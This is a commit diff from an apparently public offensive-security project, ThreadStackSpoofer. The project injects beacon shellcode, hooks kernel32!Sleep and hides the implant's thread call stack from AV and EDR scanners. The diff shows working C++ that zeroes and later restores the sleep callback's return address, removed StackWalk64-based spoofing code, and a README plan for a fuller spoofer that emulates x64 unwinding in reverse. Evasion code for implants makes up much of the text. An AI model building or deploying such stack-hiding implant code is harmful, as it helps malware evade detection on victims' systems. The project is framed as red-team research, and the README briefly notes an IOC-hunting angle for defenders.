  • ■ ■ ■ ■ ■ ■
    README.md
    skipped 11 lines
    12 12  This implementation, along with my [ShellcodeFluctuation](https://github.com/mgeeky/ShellcodeFluctuation), gives the Offensive Security community sample implementations to catch up with the offering of commercial C2 products, so that we can do no worse in our Red Team tooling. 💪
    13 13   
    14 14   
     15 +### Implementation has changed
     16 + 
     17 +The current implementation differs heavily from what was originally published. I realised that there is a much simpler way to terminate the thread's call stack and hide the shellcode-related frames: simply write `0` to the return address of our handler:
     18 + 
     19 +```
     20 +void WINAPI MySleep(DWORD _dwMilliseconds)
     21 +{
     22 + [...]
     23 + PULONG_PTR overwrite = (PULONG_PTR)_AddressOfReturnAddress();
     24 + *overwrite = 0;
     25 + 
     26 + [...]
     27 + *overwrite = origReturnAddress;
     28 +}
     29 +```
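
To see why a zeroed return address ends the trace, here is a toy model of a stack walker. It is a sketch only and not the Windows unwinder: `Frame` and `walk` are hypothetical names, and the only behaviour borrowed from the original code is that the walk stops once a return address of `0` is encountered.

```cpp
#include <cstdint>
#include <vector>

// Toy model: each frame only stores the return address into its caller.
// Index 0 is the innermost frame.
struct Frame {
    std::uintptr_t returnAddress;
};

// Collects return addresses until the stack is exhausted or a frame
// reports a return address of 0, which the walker treats as "end of stack".
std::vector<std::uintptr_t> walk(const std::vector<Frame>& stack) {
    std::vector<std::uintptr_t> trace;
    for (const Frame& f : stack) {
        if (f.returnAddress == 0) {
            break; // nothing beyond this frame is reported
        }
        trace.push_back(f.returnAddress);
    }
    return trace;
}
```

In this model, zeroing one slot hides every frame beyond it, and writing the saved value back makes the full trace visible again, which mirrors the save, overwrite and restore sequence in `MySleep`.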
     30 + 
     31 +The previous implementation, utilising `StackWalk64`, can be accessed in [commit c250724](https://github.com/mgeeky/ThreadStackSpoofer/tree/c2507248723d167fb2feddf50d35435a17fd61a2).
     32 + 
     33 + 
    15 34  ## How it works?
    16 35   
    17 36  This program performs shellcode self-injection (roughly via classic `VirtualAlloc` + `memcpy` + `CreateThread`).
    skipped 8 lines
    26 45  3. Hook `kernel32!Sleep` pointing back to our callback.
    27 46  4. Inject and launch shellcode via `VirtualAlloc` + `memcpy` + `CreateThread`. A slight twist here is that our thread starts from a legitimate `ntdll!RtlUserThreadStart+0x21` address to mimic other threads.
    28 47  5. As soon as Beacon attempts to sleep, our `MySleep` callback gets invoked.
    29  -6. Stack Spoofing begins.
    30  -7. Firstly we walk call stack of our current thread, utilising `ntdll!RtlCaptureContext` and `dbghelp!StackWalk64`
    31  -8. We save all of the stack frames that match our `seems-to-be-beacon-frame` criteria (such as return address points back to a memory being `MEM_PRIVATE` or `Type = 0`, or memory's protection flags are not `R/RX/RWX`)
    32  -9. We iterate over collected frames (gathered function frame pointers `RBP/EBP` - in `frame.frameAddr`) and overwrite _on-stack_ return addresses with a fake `::CreateFileW` address.
    33  -10. Finally a call to `::SleepEx` is made to let the Beacon's sleep while waiting for further communication.
    34  -11. After Sleep is finished, we restore previously saved original function return addresses and execution is resumed.
     48 +6. Overwrite the return address of `MySleep` on the stack with `0`, which should effectively terminate the call stack.
     49 +7. Finally, a call to `::SleepEx` is made to let the Beacon sleep while waiting for further communication.
     50 +8. After the sleep finishes, we restore the previously saved original return address and execution resumes.
    35 51   
    36 52  Function return addresses are scattered all around the thread's stack memory area, pointed to by the `RBP/EBP` register. In order to find them on the stack, we first need to collect frame pointers, then dereference them for overwriting:
    37 53   
    skipped 16 lines
    54 70   
    55 71  This in turn, when thread stack spoofing is enabled:
    56 72   
    57  -![spoofed](images/spoofed.png)
    58  - 
    59  -Above we can see a sequence of `kernel32!CreateFileW` being implanted as return addresses. That's merely an example proving that we can manipulate return addresses.
    60  -To better enhance quality of this call stack, one could prepare a list of addresses and then use them while picking subsequent frames for overwriting.
    61  - 
    62  -For example, a following chain of addresses could be used:
     73 +![spoofed](images/spoofed2.png)
    63 74   
     75 +Above we can see that the last frame on our call stack is our `MySleep` callback. That immediately creates an opportunity for IOC hunting: look for threads whose call stacks do not unwind into the following two commonly expected system entry points:
    64 76  ```
    65  -KernelBase.dll!WaitForSingleObjectEx+0x8e
    66  -KernelBase.dll!WaitForSingleObject+0x52
    67 77  kernel32!BaseThreadInitThunk+0x14
    68 78  ntdll!RtlUserThreadStart+0x21
    69 79  ```
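
The hunting idea above can be sketched as a check over frames that have already been symbolized. This is a minimal sketch under stated assumptions: frames arrive as `module!function+offset` strings ordered innermost first, and `stripOffset` and `unwindsToThreadStart` are hypothetical helper names, not part of any real scanner.

```cpp
#include <cstddef>
#include <string>
#include <vector>

// Strips a trailing "+0x..." offset so that "ntdll!RtlUserThreadStart+0x21"
// compares equal to "ntdll!RtlUserThreadStart".
static std::string stripOffset(const std::string& frame) {
    const std::size_t plus = frame.find('+');
    return plus == std::string::npos ? frame : frame.substr(0, plus);
}

// Returns true when the two outermost frames are the commonly expected
// thread entry points. Frames are ordered innermost first.
bool unwindsToThreadStart(const std::vector<std::string>& frames) {
    if (frames.size() < 2) {
        return false;
    }
    const std::string& last = frames[frames.size() - 1];
    const std::string& prev = frames[frames.size() - 2];
    return stripOffset(prev) == "kernel32!BaseThreadInitThunk"
        && stripOffset(last) == "ntdll!RtlUserThreadStart";
}
```

A check like this flags every thread whose stack ends elsewhere, so on its own it would also flag legitimate threads that never unwind to these entry points.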
    70 80   
    71  -When thinking about AVs, EDRs and other automated scanners - we don't need to care about how much legitimate our thread's call stack look, since these scanners only care whether a frame points back to a `SEC_IMAGE` memory pages, meaning it was a legitimate DLL/EXE call (and whether these DLLs are trusted/signed themselves). Thus, we don't need to bother that much about these chain of `CreateFileW` frames.
     81 +However, a brief examination of my system showed that there are plenty of threads whose call stacks do not unwind to the above entry points:
     82 + 
     83 +![legit call stack](images/legit-call-stack.png)
     84 + 
     85 +The above screenshot shows an unmodified, unhooked thread of Total Commander x64.
     86 + 
     87 +Why should we care about carefully faking our call stack when there are processes exhibiting traits that we can simply mimic?
     88 + 
    72 89   
    73 90   
    74 91  ## How do I use it?
    skipped 30 lines
    105 122  4. Create a new user stack with `RtlCreateUserStack` / `RtlFreeUserStack` and exchange stacks from a Beacons thread into that newly created one
    106 123   
    107 124   
     125 +## Implementing a true Thread Stack Spoofer
     126 + 
     127 +An hours-long conversation with [namazso](https://twitter.com/namazso) taught me that in order to aim for a proper thread stack spoofer we would need to reverse the x64 call stack unwinding process.
     128 +Firstly, one needs to carefully study the stack unwinding process explained in (a) linked below. When the system traverses a thread's call stack on the x64 architecture, it does not simply rely on return addresses scattered around the thread's stack. Instead, it:
     129 + 
     130 +1. Takes a return address.
     131 +2. Attempts to identify the function containing that address (with [RtlLookupFunctionEntry](https://docs.microsoft.com/en-us/windows/win32/api/winnt/nf-winnt-rtllookupfunctionentry)).
     132 +3. That function returns a `RUNTIME_FUNCTION` entry, which leads to the `UNWIND_INFO` and `UNWIND_CODE` structures. These structures describe the function's beginning address, its ending address, and all the code sequences that modify `RBP` or `RSP`.
     133 +4. The system needs to know about all stack and frame pointer modifications that happened in each function across the call stack, so that it can virtually _roll back_ these changes and restore the stack pointers to their values at the moment the processed frame was called (this is implemented in [RtlVirtualUnwind](https://docs.microsoft.com/ru-ru/windows/win32/api/winnt/nf-winnt-rtlvirtualunwind)).
     134 +5. The system processes all `UNWIND_CODE`s that the examined function exhibits to precisely compute the location of that frame's return address and stack pointer value.
     135 +6. Through this emulation, the system is able to walk down the chain of frames and effectively "unwind" the call stack.
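
The unwinding steps above can be modelled in a few lines of portable C++. This is a toy sketch, not `RtlVirtualUnwind`: the `Op`, `UnwindOp`, `Context`, `Memory` and `virtualUnwind` names are hypothetical, only three simplified operations are modelled, and `PushNonvol` is assumed to always save `RBP`.

```cpp
#include <cstdint>
#include <map>
#include <vector>

// Simplified unwind operations, loosely modelled on UWOP_PUSH_NONVOL,
// UWOP_ALLOC_SMALL and UWOP_SET_FPREG. Real UNWIND_CODEs carry more detail.
enum class Op { PushNonvol, Alloc, SetFpReg };

struct UnwindOp {
    Op op;
    std::uint64_t value; // Alloc: size in bytes; SetFpReg: RBP - RSP offset; PushNonvol: unused
};

struct Context {
    std::uint64_t rsp;
    std::uint64_t rbp;
    std::uint64_t rip;
};

using Memory = std::map<std::uint64_t, std::uint64_t>; // address -> 8-byte value

// Undoes one function's prologue. `ops` must be listed in reverse prologue
// order (last prologue instruction first).
Context virtualUnwind(Context ctx, const std::vector<UnwindOp>& ops, const Memory& mem) {
    for (const UnwindOp& u : ops) {
        switch (u.op) {
        case Op::SetFpReg:   // RSP is recovered from the frame pointer
            ctx.rsp = ctx.rbp - u.value;
            break;
        case Op::Alloc:      // undo "sub rsp, N"
            ctx.rsp += u.value;
            break;
        case Op::PushNonvol: // undo "push rbp"
            ctx.rbp = mem.at(ctx.rsp);
            ctx.rsp += 8;
            break;
        }
    }
    ctx.rip = mem.at(ctx.rsp); // the return address now sits at the top of the stack
    ctx.rsp += 8;              // popping it yields the caller's RSP
    return ctx;
}
```

The point of the model is that the walker never trusts a frame-pointer chain. It derives the location of the return address purely from the per-function unwind operations, which is why any spoofing attempt has to stay consistent with them.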
     136 + 
     137 +In order to interfere with this process we would need to _revert it_ by having our own reversed form of `RtlVirtualUnwind`. We would need to iterate over the functions defined in a module (say, `kernel32`), scan each function's `UNWIND_CODE`s and closely emulate them backwards (as compared to `RtlVirtualUnwind`, and more precisely `RtlpUnwindPrologue`) in order to find the locations on the stack where our fake return addresses should be placed.
     138 + 
     139 +[namazso](https://twitter.com/namazso) mentions the necessity to introduce 3 fake stack frames to nicely stitch the call stack:
     140 + 
     141 +1. A "desync" frame (consider it a _gadget-frame_) that unwinds differently compared to the caller of our `MySleep` (having a different `UWOP` - Unwind Operation code). We find it by looking through all functions from a module, looking through their UWOPs, and calculating how big the fake frame should be. This frame must have UWOPs **different** from those of our `MySleep`'s caller.
     142 +2. The next frame that we want to find is a function that unwinds by popping into `RBP` from the stack - basically through the `UWOP_PUSH_NONVOL` code.
     143 +3. For the third frame we need a function that restores `RSP` from `RBP` through the `UWOP_SET_FPREG` code.
     144 + 
     145 +The restored `RSP` must be set to the `RSP` value taken from wherever control flow entered our `MySleep`, so that all our frames become hidden as a result of the third gadget unwinding there.
     146 + 
     147 +In order to begin the process, one can iterate over the executable's `.pdata` by dereferencing the `IMAGE_DIRECTORY_ENTRY_EXCEPTION` data directory entry.
     148 +Consider the example below:
     149 + 
     150 +```
     151 + ULONG_PTR imageBase = (ULONG_PTR)GetModuleHandleA("kernel32");
     152 + PIMAGE_NT_HEADERS64 pNthdrs = PIMAGE_NT_HEADERS64(imageBase + PIMAGE_DOS_HEADER(imageBase)->e_lfanew);
     153 + 
     154 + auto excdir = pNthdrs->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_EXCEPTION];
     155 + if (excdir.Size == 0 || excdir.VirtualAddress == 0)
     156 + return;
     157 + 
     158 + auto begin = PRUNTIME_FUNCTION(excdir.VirtualAddress + imageBase);
     159 + auto end = PRUNTIME_FUNCTION(excdir.VirtualAddress + imageBase + excdir.Size);
     160 + 
     161 + UNWIND_HISTORY_TABLE mshist = { 0 };
     162 + DWORD64 imageBase2 = 0;
     163 + 
     164 + PRUNTIME_FUNCTION currFrame = RtlLookupFunctionEntry(
     165 + (DWORD64)caller,
     166 + &imageBase2,
     167 + &mshist
     168 + );
     169 + 
     170 + UNWIND_INFO *mySleep = (UNWIND_INFO*)(currFrame->UnwindData + imageBase2);
     171 + UNWIND_CODE myFrameUwop = (UNWIND_CODE)(mySleep->UnwindCodes[0]);
     172 + 
     173 + log("1. MySleep RIP UWOP: ", myFrameUwop.UnwindOpcode);
     174 + 
     175 + for (PRUNTIME_FUNCTION it = begin; it < end; ++it)
     176 + {
     177 + UNWIND_INFO* unwindData = (UNWIND_INFO*)(it->UnwindData + imageBase);
     178 + UNWIND_CODE frameUwop = (UNWIND_CODE)(unwindData->UnwindCodes[0]);
     179 + 
     180 + if (frameUwop.UnwindOpcode != myFrameUwop.UnwindOpcode)
     181 + {
     182 + // Found candidate function for a desynch gadget frame
     183 + 
     184 + }
     185 + }
     186 +```
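
The example above compares only the opcode of the first unwind code. As a hedged aside, the sketch below shows how a single two-byte unwind code slot splits into its fields, following the layout described in Microsoft's x64 exception handling documentation (reference (a)). The `DecodedUnwindCode`, `decodeUnwindCode` and `allocSmallSize` names are hypothetical, and only a subset of the opcodes is listed.

```cpp
#include <cstdint>

// Subset of the x64 unwind operation codes.
enum UwopCode : std::uint8_t {
    UWOP_PUSH_NONVOL = 0,
    UWOP_ALLOC_LARGE = 1,
    UWOP_ALLOC_SMALL = 2,
    UWOP_SET_FPREG   = 3,
};

struct DecodedUnwindCode {
    std::uint8_t prologOffset; // offset in the prologue just past the instruction
    std::uint8_t opcode;       // low 4 bits of the second byte
    std::uint8_t opInfo;       // high 4 bits of the second byte
};

// Splits one unwind code slot (two bytes) into its three fields.
DecodedUnwindCode decodeUnwindCode(std::uint8_t first, std::uint8_t second) {
    DecodedUnwindCode d;
    d.prologOffset = first;
    d.opcode = static_cast<std::uint8_t>(second & 0x0F);
    d.opInfo = static_cast<std::uint8_t>(second >> 4);
    return d;
}

// For UWOP_ALLOC_SMALL the allocation size is encoded as opInfo * 8 + 8.
std::uint32_t allocSmallSize(const DecodedUnwindCode& d) {
    return static_cast<std::uint32_t>(d.opInfo) * 8u + 8u;
}
```

Note that a function may carry no unwind codes at all (a `CountOfCodes` of 0 in the documented `UNWIND_INFO` layout), so a real scan would presumably check that count before reading `UnwindCodes[0]`.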
     187 + 
     188 +The process is a bit convoluted, yet it boils down to reverting the thread's call stack unwinding process by substituting arbitrary stack frames with other, carefully selected ones, in a ROP-like approach.
     189 + 
     190 +This PoC does not replicate this algorithm, because my current understanding allows me to accept the call stack finishing on an `EXE`-based stack frame, and I don't want to overcomplicate either my shellcode loaders or this PoC. Implementing this and sharing it publicly is left as an exercise for a keen reader. Or maybe I'll sit down and try doing it myself given some more spare time :)
     191 + 
     192 + 
     193 +**More information**:
     194 + 
     195 +a) [x64 exception handling - Stack Unwinding process explained](https://docs.microsoft.com/en-us/cpp/build/exception-handling-x64?view=msvc-160)
     196 +b) [Sample implementation of `RtlpUnwindPrologue` and `RtlVirtualUnwind`](https://github.com/mic101/windows/blob/master/WRK-v1.2/base/ntos/rtl/amd64/exdsptch.c)
     197 +c) [`.pdata` section](https://docs.microsoft.com/en-us/windows/win32/debug/pe-format#the-pdata-section)
     198 +d) [another sample implementation of `RtlpUnwindPrologue`](https://github.com/hzqst/unicorn_pe/blob/master/unicorn_pe/except.cpp#L773)
     199 + 
     200 + 
    108 201  ## Example run
    109 202   
    110 203  Use case:
    skipped 10 lines
    121 214  Example run that spoofs beacon's thread call stack:
    122 215   
    123 216  ```
    124  -C:\> ThreadStackSpoofer.exe beacon64.bin 1
     217 +PS D:\dev2\ThreadStackSpoofer> .\x64\Release\ThreadStackSpoofer.exe .\tests\beacon64.bin 1
    125 218  [.] Reading shellcode bytes...
    126  -[.] Thread call stack will be spoofed.
    127  -[+] Stack spoofing initialized.
    128 219  [.] Hooking kernel32!Sleep...
    129 220  [.] Injecting shellcode...
    130  - 
    131  -WalkCallStack: Stack Trace:
    132  - 2. calledFrom: 0x7ff7c8ba7f54 - stack: 0xdc5eaffbd0 - frame: 0xdc5eaffce0 - ret: 0x2550d3ebd51 - skip? 0
    133  - 3. calledFrom: 0x2550d3ebd51 - stack: 0xdc5eaffcf0 - frame: 0xdc5eaffce8 - ret: 0x1388 - skip? 0
    134  - 4. calledFrom: 0x 1388 - stack: 0xdc5eaffcf8 - frame: 0xdc5eaffcf0 - ret: 0x2550d1ff760 - skip? 0
    135  - 5. calledFrom: 0x2550d1ff760 - stack: 0xdc5eaffd00 - frame: 0xdc5eaffcf8 - ret: 0x1b000100000004 - skip? 0
    136  - 6. calledFrom: 0x1b000100000004 - stack: 0xdc5eaffd08 - frame: 0xdc5eaffd00 - ret: 0xd00017003a0001 - skip? 0
    137  - 7. calledFrom: 0xd00017003a0001 - stack: 0xdc5eaffd10 - frame: 0xdc5eaffd08 - ret: 0x2550d5b7040 - skip? 0
    138  - 8. calledFrom: 0x2550d5b7040 - stack: 0xdc5eaffd18 - frame: 0xdc5eaffd10 - ret: 0x2550d3ccd9f - skip? 0
    139  - 9. calledFrom: 0x2550d3ccd9f - stack: 0xdc5eaffd20 - frame: 0xdc5eaffd18 - ret: 0x2550d3ccdd0 - skip? 0
    140  - Spoofed: 0x2550d3ebd51 -> 0x7ffeb7f74b60
    141  - Spoofed: 0x00001388 -> 0x7ffeb7f74b60
    142  - Spoofed: 0x2550d1ff760 -> 0x7ffeb7f74b60
    143  - Spoofed: 0x1b000100000004 -> 0x7ffeb7f74b60
    144  - Spoofed: 0xd00017003a0001 -> 0x7ffeb7f74b60
    145  - Spoofed: 0x2550d5b7040 -> 0x7ffeb7f74b60
    146  - Spoofed: 0x2550d3ccd9f -> 0x7ffeb7f74b60
    147  - Spoofed: 0x2550d3ccdd0 -> 0x7ffeb7f74b60
     221 +[+] Shellcode is now running.
     222 +[>] Original return address: 0x1926747bd51. Finishing call stack...
    148 223   
    149 224  ===> MySleep(5000)
    150 225   
    151  -[+] Shellcode is now running.
     226 +[<] Restoring original return address...
     227 +[>] Original return address: 0x1926747bd51. Finishing call stack...
    152 228   
    153  -WalkCallStack: Stack Trace:
    154  - 2. calledFrom: 0x7ff7c8ba7f84 - stack: 0xdc5eaffbd0 - frame: 0xdc5eaffce0 - ret: 0x7ffeb7f74b60 - skip? 1
    155  - 3. calledFrom: 0x7ffeb7f74b60 - stack: 0xdc5eaffcf0 - frame: 0xdc5eaffce8 - ret: 0x7ffeb7f74b60 - skip? 1
    156  - 4. calledFrom: 0x7ffeb7f74b60 - stack: 0xdc5eaffcf8 - frame: 0xdc5eaffcf0 - ret: 0x7ffeb7f74b60 - skip? 1
    157  - 5. calledFrom: 0x7ffeb7f74b60 - stack: 0xdc5eaffd00 - frame: 0xdc5eaffcf8 - ret: 0x7ffeb7f74b60 - skip? 1
    158  - 6. calledFrom: 0x7ffeb7f74b60 - stack: 0xdc5eaffd08 - frame: 0xdc5eaffd00 - ret: 0x7ffeb7f74b60 - skip? 1
    159  - 7. calledFrom: 0x7ffeb7f74b60 - stack: 0xdc5eaffd10 - frame: 0xdc5eaffd08 - ret: 0x7ffeb7f74b60 - skip? 1
    160  - 8. calledFrom: 0x7ffeb7f74b60 - stack: 0xdc5eaffd18 - frame: 0xdc5eaffd10 - ret: 0x7ffeb7f74b60 - skip? 1
    161  - 9. calledFrom: 0x7ffeb7f74b60 - stack: 0xdc5eaffd20 - frame: 0xdc5eaffd18 - ret: 0x7ffeb7f74b60 - skip? 1
    162  - Restored: 0x7ffeb7f74b60 -> 0x2550d3ebd51
    163  - Restored: 0x7ffeb7f74b60 -> 0x1388
    164  - Restored: 0x7ffeb7f74b60 -> 0x2550d1ff760
    165  - Restored: 0x7ffeb7f74b60 -> 0x1b000100000004
    166  - Restored: 0x7ffeb7f74b60 -> 0xd00017003a0001
    167  - Restored: 0x7ffeb7f74b60 -> 0x2550d5b7040
    168  - Restored: 0x7ffeb7f74b60 -> 0x2550d3ccd9f
    169  - Restored: 0x7ffeb7f74b60 -> 0x2550d3ccdd0
     229 +===> MySleep(5000)
     230 + 
     231 +[<] Restoring original return address...
     232 +[>] Original return address: 0x1926747bd51. Finishing call stack...
    170 233  ```
    171 234   
    172 235  ## Word of caution
    skipped 54 lines
  • ■ ■ ■ ■ ■
    ThreadStackSpoofer/header.h
    1 1  #pragma once
    2 2   
    3 3  #include <windows.h>
    4  -#include <DbgHelp.h>
    5 4  #include <iostream>
    6 5  #include <sstream>
    7 6  #include <iomanip>
    8 7  #include <vector>
    9  - 
    10 8   
    11 9  typedef void (WINAPI* typeSleep)(
    12 10   DWORD dwMilis
    13 11   );
    14 12   
    15  -typedef BOOL(__stdcall* typeStackWalk64)(
    16  - DWORD MachineType,
    17  - HANDLE hProcess,
    18  - HANDLE hThread,
    19  - LPSTACKFRAME64 StackFrame,
    20  - PVOID ContextRecord,
    21  - PREAD_PROCESS_MEMORY_ROUTINE64 ReadMemoryRoutine,
    22  - PFUNCTION_TABLE_ACCESS_ROUTINE64 FunctionTableAccessRoutine,
    23  - PGET_MODULE_BASE_ROUTINE64 GetModuleBaseRoutine,
    24  - PTRANSLATE_ADDRESS_ROUTINE64 TranslateAddress
    25  - );
    26  - 
    27  -typedef BOOL(__stdcall* typeSymInitialize)(
    28  - IN HANDLE hProcess,
    29  - IN LPCSTR UserSearchPath,
    30  - IN BOOL fInvadeProcess
    31  - );
    32  - 
    33 13  typedef std::unique_ptr<std::remove_pointer<HANDLE>::type, decltype(&::CloseHandle)> HandlePtr;
    34 14   
    35  -struct CallStackFrame
    36  -{
    37  - ULONG_PTR calledFrom;
    38  - ULONG_PTR stackAddr;
    39  - ULONG_PTR frameAddr;
    40  - ULONG_PTR origFrameAddr;
    41  - ULONG_PTR retAddr;
    42  - ULONG_PTR overwriteWhat;
    43  -};
    44  - 
    45  -static const size_t MaxStackFramesToSpoof = 64;
    46  -struct StackTraceSpoofingMetadata
    47  -{
    48  - HMODULE hDbghelp;
    49  - typeStackWalk64 pStackWalk64;
    50  - LPVOID pSymFunctionTableAccess64;
    51  - LPVOID pSymGetModuleBase64;
    52  - bool initialized;
    53  - CallStackFrame spoofedFrame[MaxStackFramesToSpoof];
    54  - size_t spoofedFrames;
    55  -};
    56  - 
    57 15  struct HookedSleep
    58 16  {
    59 17   typeSleep origSleep;
    skipped 11 lines
    71 29   DWORD previousBytesSize;
    72 30  };
    73 31   
    74  - 
    75 32  template<class... Args>
    76 33  void log(Args... args)
    77 34  {
    skipped 3 lines
    81 38   std::cout << oss.str() << std::endl;
    82 39  }
    83 40   
    84  -static const size_t Frames_To_Preserve = 2;
    85 41  static const DWORD Shellcode_Memory_Protection = PAGE_EXECUTE_READ;
    86 42   
    87 43  bool hookSleep();
     44 +void runShellcode(LPVOID param);
    88 45  bool injectShellcode(std::vector<uint8_t>& shellcode, HandlePtr& thread);
    89 46  bool readShellcode(const char* path, std::vector<uint8_t>& shellcode);
    90  -void walkCallStack(HANDLE hThread, CallStackFrame* frames, size_t maxFrames, size_t* numOfFrames, bool onlyBeaconFrames, size_t framesToPreserve = Frames_To_Preserve);
    91  -bool initStackSpoofing();
    92 47  bool fastTrampoline(bool installHook, BYTE* addressToHook, LPVOID jumpAddress, HookTrampolineBuffers* buffers = NULL);
    93  -void spoofCallStack(bool overwriteOrRestore);
    94 48  void WINAPI MySleep(DWORD _dwMilliseconds);
  • ■ ■ ■ ■ ■
    ThreadStackSpoofer/main.cpp
    skipped 2 lines
    3 3  #include <intrin.h>
    4 4   
    5 5  HookedSleep g_hookedSleep;
    6  -StackTraceSpoofingMetadata g_stackTraceSpoofing;
    7 6   
    8 7   
    9 8  void WINAPI MySleep(DWORD _dwMilliseconds)
    skipped 1 lines
    11 10   const register DWORD dwMilliseconds = _dwMilliseconds;
    12 11   
    13 12   // Perform this (current) thread call stack spoofing.
    14  - spoofCallStack(true);
     13 + PULONG_PTR overwrite = (PULONG_PTR)_AddressOfReturnAddress();
     14 + const register ULONG_PTR origReturnAddress = *overwrite;
     15 + 
     16 + log("[>] Original return address: 0x", std::hex, std::setw(8), std::setfill('0'), origReturnAddress, ". Finishing call stack...");
     17 + *overwrite = 0;
    15 18   
    16 19   log("\n===> MySleep(", std::dec, dwMilliseconds, ")\n");
    17 20   
    skipped 1 lines
    19 22   ::SleepEx(dwMilliseconds, false);
    20 23   
    21 24   // Restore original thread's call stack.
    22  - spoofCallStack(false);
     25 + log("[<] Restoring original return address...");
     26 + *overwrite = origReturnAddress;
    23 27  }
    24 28   
    25 29  bool fastTrampoline(bool installHook, BYTE* addressToHook, LPVOID jumpAddress, HookTrampolineBuffers* buffers /*= NULL*/)
    skipped 87 lines
    113 117   return true;
    114 118  }
    115 119   
    116  -void walkCallStack(HANDLE hThread, CallStackFrame* frames, size_t maxFrames, size_t* numOfFrames, bool onlyBeaconFrames, size_t framesToPreserve)
    117  -{
    118  - CONTEXT c = { 0 };
    119  - STACKFRAME64 s = { 0 };
    120  - DWORD imageType;
    121  - ULONG curRecursionCount = 0;
    122  - 
    123  - c.ContextFlags = CONTEXT_ALL;
    124  - 
    125  - //
    126  - // It looks like RtlCaptureContext was able to acquire running thread's context,
    127  - // while GetThreadContext failed at doing so.
    128  - //
    129  - if (hThread == GetCurrentThread() || hThread == 0)
    130  - RtlCaptureContext(&c);
    131  - else
    132  - GetThreadContext(hThread, &c);
    133  - 
    134  -#ifdef _M_IX86
    135  - const ULONG_PTR invalidAddr = 0xcccccccc;
    136  - // normally, call ImageNtHeader() and use machine info from PE header
    137  - imageType = IMAGE_FILE_MACHINE_I386;
    138  - s.AddrPC.Offset = c.Eip;
    139  - s.AddrPC.Mode = AddrModeFlat;
    140  - s.AddrFrame.Offset = c.Ebp;
    141  - s.AddrFrame.Mode = AddrModeFlat;
    142  - s.AddrStack.Offset = c.Esp;
    143  - s.AddrStack.Mode = AddrModeFlat;
    144  -#elif _M_X64
    145  - const ULONG_PTR invalidAddr = 0xcccccccccccccccc;
    146  - imageType = IMAGE_FILE_MACHINE_AMD64;
    147  - s.AddrPC.Offset = c.Rip;
    148  - s.AddrPC.Mode = AddrModeFlat;
    149  - s.AddrFrame.Offset = c.Rsp;
    150  - s.AddrFrame.Mode = AddrModeFlat;
    151  - s.AddrStack.Offset = c.Rsp;
    152  - s.AddrStack.Mode = AddrModeFlat;
    153  -#elif _M_IA64
    154  - const ULONG_PTR invalidAddr = 0xcccccccccccccccc;
    155  - imageType = IMAGE_FILE_MACHINE_IA64;
    156  - s.AddrPC.Offset = c.StIIP;
    157  - s.AddrPC.Mode = AddrModeFlat;
    158  - s.AddrFrame.Offset = c.IntSp;
    159  - s.AddrFrame.Mode = AddrModeFlat;
    160  - s.AddrBStore.Offset = c.RsBSP;
    161  - s.AddrBStore.Mode = AddrModeFlat;
    162  - s.AddrStack.Offset = c.IntSp;
    163  - s.AddrStack.Mode = AddrModeFlat;
    164  -#else
    165  -#error "Platform not supported!"
    166  -#endif
    167  - 
    168  - log("\nWalkCallStack: Stack Trace: ");
    169  - 
    170  - *numOfFrames = 0;
    171  - ULONG Frame = 0;
    172  - 
    173  - for (Frame = 0; ; Frame++)
    174  - {
    175  - //
    176  - // A call to dbghelp!StackWalk64 that will let us iterate over thread's call stack.
    177  - //
    178  - BOOL result = g_stackTraceSpoofing.pStackWalk64(
    179  - imageType,
    180  - GetCurrentProcess(),
    181  - hThread,
    182  - &s,
    183  - &c,
    184  - NULL,
    185  - (PFUNCTION_TABLE_ACCESS_ROUTINE64)g_stackTraceSpoofing.pSymFunctionTableAccess64,
    186  - (PGET_MODULE_BASE_ROUTINE64)g_stackTraceSpoofing.pSymGetModuleBase64,
    187  - NULL
    188  - );
    189  - 
    190  - if (!result || s.AddrReturn.Offset == 0)
    191  - break;
    192  - 
    193  - if (s.AddrPC.Offset == s.AddrReturn.Offset)
    194  - {
    195  - if (curRecursionCount > 1000)
    196  - {
    197  - // Overly deep recursion spotted, bailing out.
    198  - break;
    199  - }
    200  - curRecursionCount++;
    201  - }
    202  - else
    203  - {
    204  - curRecursionCount = 0;
    205  - }
    206  - 
    207  - CallStackFrame frame = { 0 };
    208  - 
    209  - frame.calledFrom = s.AddrPC.Offset;
    210  - frame.stackAddr = s.AddrStack.Offset;
    211  - frame.frameAddr = s.AddrFrame.Offset;
    212  - frame.retAddr = s.AddrReturn.Offset;
    213  - 
    214  - if (Frame > maxFrames)
    215  - break;
    216  - 
    217  - //
    218  - // Skip first two frames as they most likely link back to our callers - and thus we can't spoof them:
    219  - // MySleep(...) -> spoofCallStack(...) -> ...
    220  - //
    221  - if (Frame < framesToPreserve)
    222  - continue;
    223  - 
    224  - bool skipFrame = false;
    225  - 
    226  - if (onlyBeaconFrames)
    227  - {
    228  - MEMORY_BASIC_INFORMATION mbi = { 0 };
    229  - 
    230  - if (VirtualQuery((LPVOID)frame.retAddr, &mbi, sizeof(mbi)))
    231  - {
    232  - //
    233  - // If a frame points back to memory pages that are not MEM_PRIVATE (originating from VirtualAlloc)
    234  - // we can skip them, as they shouldn't point back to our beacon's memory pages.
    235  - // Also I've noticed, that for some reason parameter for kernel32!Sleep clobbers stack, making it look like
    236  - // it's a frame by its own. That address (5 seconds = 5000ms = 0x1388) when queried with VirtualQuery seems to return
    237  - // mbi.Type == 0. We're using this observation to include such frame in spoofing.
    238  - //
    239  - if (mbi.Type != MEM_PRIVATE && mbi.Type != 0) skipFrame = true;
    240  - 
    241  - }
    242  - 
    243  - if (frame.retAddr == invalidAddr) skipFrame = true;
    244  - }
    245  - 
    246  - if (!skipFrame && frame.retAddr != 0 && frame.frameAddr != 0)
    247  - {
    248  - frames[(*numOfFrames)++] = frame;
    249  - }
    250  - 
    251  - log("\t", std::dec, Frame, ".\tcalledFrom: 0x", std::setw(8), std::hex, frame.calledFrom, " - stack: 0x", frame.stackAddr,
    252  - " - frame: 0x", frame.frameAddr, " - ret: 0x", frame.retAddr, " - skip? ", skipFrame);
    253  - }
    254  -}
    255  - 
    256  -void spoofCallStack(bool overwriteOrRestore)
    257  -{
    258  - CallStackFrame frames[MaxStackFramesToSpoof] = { 0 };
    259  - size_t numOfFrames = 0;
    260  - 
    261  - //
    262  - // Firstly we walk through the current thread's call stack collecting all frames
    263  - // that resemble references to Beacon's allocation pages (or are in any other means anomalous by looking).
    264  - //
    265  - walkCallStack(GetCurrentThread(), frames, _countof(frames), &numOfFrames, true);
    266  - 
    267  - if (overwriteOrRestore)
    268  - {
    269  - for (size_t i = 0; i < numOfFrames; i++)
    270  - {
    271  - auto& frame = frames[i];
    272  - 
